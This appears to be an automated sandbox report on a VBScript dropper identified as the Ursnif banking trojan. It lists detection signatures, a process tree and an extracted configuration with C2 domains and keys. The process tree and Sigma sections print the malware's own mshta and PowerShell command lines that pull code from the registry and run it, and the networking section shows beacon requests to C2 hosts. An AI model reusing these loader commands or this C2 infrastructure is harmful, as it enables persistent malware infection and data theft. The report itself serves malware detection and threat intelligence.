
Windows Analysis Report start[526268].vbs

Overview

General Information

Sample Name: start[526268].vbs
Analysis ID: 480986
MD5: b0de0a696f7b17724fef5c5e0af2bd1d
SHA1: 3de72b8cae6a84f82e05cae18f48a1a302dbebc3
SHA256: e3a1fb3e932aae628aa08bde31be3b30861fa90ca16db4f81d7989093e1fddbe
Tags: vbs

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: Powershell run code from registry
Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Java / VBScript file with very long strings (likely obfuscated code)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5464 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[526268].vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • WmiPrvSE.exe (PID: 5832 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • rundll32.exe (PID: 5004 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 3128 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • WmiPrvSE.exe (PID: 5336 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 7AB59579BA91115872D6E51C54B9133B)
  • WmiPrvSE.exe (PID: 4088 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • mshta.exe (PID: 1956 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4216 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4624 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5920 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESFECC.tmp' 'c:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "4AYdzflNRXYlq5A89hwCjrU+QvoXxjpdUxRPAdq3bBwI9ExkYDjHy9AWeshiGXrgIzFlNVtLrifcFS4LJjRxWiTG6Fca4Vt6MI5WOos+fChdUStUtjzPhvjxLI5XIPSBz5r2O1dlmC1xuOEDpRs8BbpWGdZ2yYEdD2dU4efFbSK7SBcRAao3mGwKzc2GlmjegxJ/fScW81u3keNnZqy2SbgEIUg5Ycv4J3eUirSdWDASxFovB3C3eAKRiuRkEzJcRqU2y9vVOyCbmx6uiVNonJWQxMoDxpw6mwokGsvtDFEgCJXMl+lbKlUaqdSAUK0Tij5ay8sYpetWDvt4nCFDVBf09fSWTGo06hdy0B5+I4w=", "c2_domain": ["art.microsoftsofymicrosoftsoft.at", "r23cirt55ysvtdvl.onion", "fop.langoonik.com", "poi.redhatbabby.at", "pop.biopiof.at", "l46t3vgvmtx5wxe6.onion", "v10.avyanok.com", "apr.intoolkom.at", "fgx.dangerboy.at"], "ip_check_url": ["curlmyip.net", "ident.me", "l2.io/ip", "whatismyip.akamai.com"], "serpent_key": "rQH4gusjF0tL2dQz", "server": "580", "sleep_time": "5", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "600", "time_value": "600", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "240", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "240", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "2500", "SetWaitableTimer_value": "60"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmp | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
11 further entries not shown.

Unpacked PEs

Source | Rule | Description | Author | Strings
34.3.rundll32.exe.566a4a0.1.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
34.3.rundll32.exe.5718d48.2.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
34.3.rundll32.exe.566a4a0.1.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
34.3.rundll32.exe.5718d48.2.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
34.3.rundll32.exe.56e94a0.3.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Encoded IEX
Source: Process started. Author: Florian Roth. Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4216
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started. Author: Michael Haag. Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4216
Sigma detected: Mshta Spawning Windows Shell
Source: Process started. Author: Florian Roth. Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4216
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started. Author: Florian Roth. Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4216, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline', ProcessId: 4624
Sigma detected: Non Interactive PowerShell
Source: Process started. Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements). Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4216
Sigma detected: T1086 PowerShell Execution
Source: Pipe created. Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research). Data: PipeName: \PSHost.132757561457280033.4216.DefaultAppDomain.powershell

Data Obfuscation:

Sigma detected: Powershell run code from registry
Source: Process started. Author: Joe Security. Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4216

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Malware Configuration Extractor: Ursnif (same configuration as listed under Malware Configuration above)
Antivirus detection for URL or domain
Source: http://atl.bigbigpoppa.com/NhQOwDmOWNWhoZkCuvIJYT/yyrgcNktQOio5/MAWNnOPh/YOpi6p7HZNMrM8dfCZNfhKR/6onGC0_2Fj/Z9tF912mepKiyl36W/W4huWMRggYfW/XcsWaKpGEUD/RLGSHFoZE1byyc/rlBcayy_2BaEyDegqhXic/uK_2B61p_2BSvpFm/KyqmkPSMKG7KXQh/rKyHlYF1pKbQ_2FrYs/GJ_2FCBgc/9AGhinNAfGtoNp19N2M0/VRQmCiVDj4baSUAqCoz/3V8nTzokn2tRxlMEPZAuLu/2tgH0PvXzWJgh/YQdIJgxg/bNHS_2BzqfAV52iuY_2FTg4/1Z1d8SkfRiehoMkV7n/yUZu, Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: atl.bigbigpoppa.com, Virustotal: Detection: 8%
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 34_2_01203276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdb, source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdbXP, source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb, source: wscript.exe, 00000000.00000003.391888818.000002CC178CF000.00000004.00000001.sdmp, fum.cpp.0.dr
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdb, source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdbXP, source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49790 -> 185.251.90.253:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49790 -> 185.251.90.253:80
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49791 -> 185.251.90.253:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49791 -> 185.251.90.253:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49792 -> 185.251.90.253:80
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49793 -> 185.251.90.253:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49793 -> 185.251.90.253:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 185.251.90.253 80
Source: Joe Sandbox View, ASN Name: SPRINTHOSTRU SPRINTHOSTRU
Source: Joe Sandbox View, IP Address: 185.251.90.253 185.251.90.253
Source: global traffic, HTTP traffic detected: GET /NhQOwDmOWNWhoZkCuvIJYT/yyrgcNktQOio5/MAWNnOPh/YOpi6p7HZNMrM8dfCZNfhKR/6onGC0_2Fj/Z9tF912mepKiyl36W/W4huWMRggYfW/XcsWaKpGEUD/RLGSHFoZE1byyc/rlBcayy_2BaEyDegqhXic/uK_2B61p_2BSvpFm/KyqmkPSMKG7KXQh/rKyHlYF1pKbQ_2FrYs/GJ_2FCBgc/9AGhinNAfGtoNp19N2M0/VRQmCiVDj4baSUAqCoz/3V8nTzokn2tRxlMEPZAuLu/2tgH0PvXzWJgh/YQdIJgxg/bNHS_2BzqfAV52iuY_2FTg4/1Z1d8SkfRiehoMkV7n/yUZu HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: atl.bigbigpoppa.com
Source: global traffic, HTTP traffic detected: GET /JWEVOwMBnh_2FtPS/WMS3RPVZyjTSnTq/9Hxp202Yz5PgJEOrB6/nF_2FNmSa/SQyIRZk5j_2B3OcT7rdM/7npsCxfJSu8JbD_2FiM/y1HBEgDsmQFEPX27nGHHbz/zR0jF_2FnlVo0/Nxk3zALE/ofyPMDXzWjS1IpBinC5Sz4W/cf_2F5pD8G/46Dgl0akFp2cXbFnY/HwtGCbH5Q64m/f9VXk69LnhQ/x_2B8W86eQh4Rn/mNr7OMCC6GA9c9ph_2Bg7/ddhYlIa8YUPQgtGC/8R2fSBf4sQLaQ_2/FLycNJhDT_2FxWMMIH/41wPmVaCG/UdSw_2BuW4yZulffApAL/Gvq14U65qaj/9np83 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: atl.bigbigpoppa.com
Source: global traffic, HTTP traffic detected: GET /gO6fEM48Z2VyJYyEaQk/Tlg2ka7bPKYxRb_2B442I_/2FFZLVL8c_2BN/KPEiurg_/2FQFW58y_2BC5_2BoQJsMfC/Z20kSl3bCK/Qe_2BCo_2BI8EhVfz/gaTQA1FJpKmh/Okd_2B3iR1p/U_2F_2F_2BxYfZ/z_2B8obDRzLj_2BvPtXpS/MutYXow3kjfHv8Ne/Tk41k1QbLs08co6/pw6aojLzb_2BsMklC7/1luisc2vx/yYmG1Q6eqChu6qOfd2lR/zgadpa0en2mVI5QE7we/rWllKXh4B6iqFxDAWQqk8G/Oj17QsJan3SWq/MhUPAmuR/Yiolc5JDgbwuOe67l9VgfXi/kgInUUiADdo06Z7N/8 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: atl.bigbigpoppa.com
Source: global traffic, HTTP traffic detected: GET /fpsVrgA85_2/BZUV9Iws3c_2Fj/GkkWmnklFKPgFBQ8hMP6W/ISGgirn8yOZisrZs/5_2BH8scRlnvRek/EGKptIwp8lSo93GFx6/ymWkd9jdg/4KpkPYuuZAAAek8BuLEK/tznSDyfWtC0KjQGP2d_/2BrsiHfOmQlV7YgPTes0MP/b6lv_2B55mg9j/CZcF_2Fn/c7jP_2BxBvmhfldW4gAwZkY/uow0BznEMg/Wu3a_2FnHyKBj_2BJ/8ZnXzqvUM8Ze/cMFtkguu1z4/ENTz8901wZ21V2/97iMfuV3Gozq6_2FCxmu3/2vuyb0vOGb_2B1J_/2BS8kN2df/902r HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: art.microsoftsofymicrosoftsoft.at
Source: global traffic, HTTP traffic detected: POST /E5wXpiwar/wRvu2gZe47zRdlNBgcs0/eOhrCgUr4ZXAn_2BZqF/9q3EAQRMUh_2B_2F33UbfY/IXr06mXceQHe3/2iAe1c3a/9nqOhYkWYxxgxCOECBlwLnA/sWEj3oJk5h/PRzUbXzmSIea8A2EU/_2FwPSG35Krj/kfkkMNBeoRA/5ZUbFMHjnJYo4_/2Fjo7tU3n9R4Z09v5Qh4q/QBVxo02azbkNlwWF/Bex9GHi32MTaVfj/GKDsgaU6HjZIpEcGiU/Q_2FxW4S4/w_2F825rdJVVRhGtH6Fv/DcD1MSlvdu470uFUctq/iMqZ2HgnOsvQUh/nmg HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 | Content-Length: 2 | Host: art.microsoftsofymicrosoftsoft.at
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 10 Sep 2021 05:02:45 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 146 | Connection: close | Vary: Accept-Encoding | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: powershell.exe, 00000027.00000002.677979658.0000019D8B650000.00000004.00000001.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000027.00000002.678446802.0000019D8B851000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp, String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp, String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp, String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmp, String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp, String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown, HTTP traffic detected: POST /E5wXpiwar/wRvu2gZe47zRdlNBgcs0/eOhrCgUr4ZXAn_2BZqF/9q3EAQRMUh_2B_2F33UbfY/IXr06mXceQHe3/2iAe1c3a/9nqOhYkWYxxgxCOECBlwLnA/sWEj3oJk5h/PRzUbXzmSIea8A2EU/_2FwPSG35Krj/kfkkMNBeoRA/5ZUbFMHjnJYo4_/2Fjo7tU3n9R4Z09v5Qh4q/QBVxo02azbkNlwWF/Bex9GHi32MTaVfj/GKDsgaU6HjZIpEcGiU/Q_2FxW4S4/w_2F825rdJVVRhGtH6Fv/DcD1MSlvdu470uFUctq/iMqZ2HgnOsvQUh/nmg HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 | Content-Length: 2 | Host: art.microsoftsofymicrosoftsoft.at
Source: unknown, DNS traffic detected: queries for: atl.bigbigpoppa.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
